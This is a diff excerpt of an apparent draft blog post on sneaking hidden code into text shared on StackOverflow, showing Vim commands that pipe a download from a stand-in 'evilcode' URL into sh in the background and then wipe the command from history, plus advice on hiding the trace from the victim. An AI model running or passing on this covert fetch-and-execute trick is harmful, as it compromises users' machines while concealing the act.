sh1boot/sh1boot.github.io/drafts/embedding-surprise-code-on-stackoverflow.md

 :call system('(curl -s https://example.com/evilcode|sh)&')
 :call histdel('cmd','evilcode')
 ```
-After that drop back into insert mode and keep adding plausible text to
-the file to clear the status line of the result of the last command.

-Notice that these are both short commands which will almost certainly
-fit on one line.
-If they're longer then there's a much greater risk
-that the drawing and redrawing of a multi-line command buffer will be
-visible to the user, if only in a brief flash which might attract
-unwanted attention.

 The first executes a shell to get curl to download some code and run it;
 and it does so in the background rather than waiting for it to finish.